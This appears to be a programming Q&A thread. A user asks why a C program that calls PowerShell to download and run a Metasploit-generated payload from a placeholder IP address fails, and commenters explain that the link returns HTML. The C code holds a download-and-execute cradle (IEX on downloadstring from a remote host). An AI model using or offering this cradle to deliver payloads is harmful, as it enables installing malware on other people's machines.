# Powershell download file and execute C

Tags: c, powershell

Trying to get a powershell to download a file I hosted with a direct link online. Here is the code.

```
#include<stdio.h>

main()
{
    system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://X.X.X.X/payload.txt '))\"");
    return 0;
}
```

Here is what I get in the terminal that opens:

[image: errors]

Comment: it seems that your `payload.txt ` is not valid PowerShell script.

Comment: Hi, PS is parsing the source of a web page (javascript code from facebook + HTML code), that's why it gets all red.

Comment: @PetSerAl is dead on. You can't execute an HTML file as a PowerShell script. Also, why aren't you using `Get-WebRequest`?

Comment: And why *are* you using `IEX`? That's saying (PowerShell should run this: (Powershell should run this (content))

Comment: That's what I was told to use and I was given that exact code to work with. I made the payload in metasploit using kali so I don't think that its the payload thats wrong. Not sure what the exact code would be to fix this

Comment: @TessellatingHeckler  I'm not hosting the file off facebook, its off of a file hosting called expirebox. Not sure how I can host the file, I don't want to randomly hack someone because that's illegal. I just have friends test it for me. What should the correct file say. It's a file that is originally a .c till I compile to an exe

Comment: Honestly, if you really want to host a code file, put it on Github (public repos are free) or Bitbucket (has free private repos with limit number of users) and use git to check out the repository.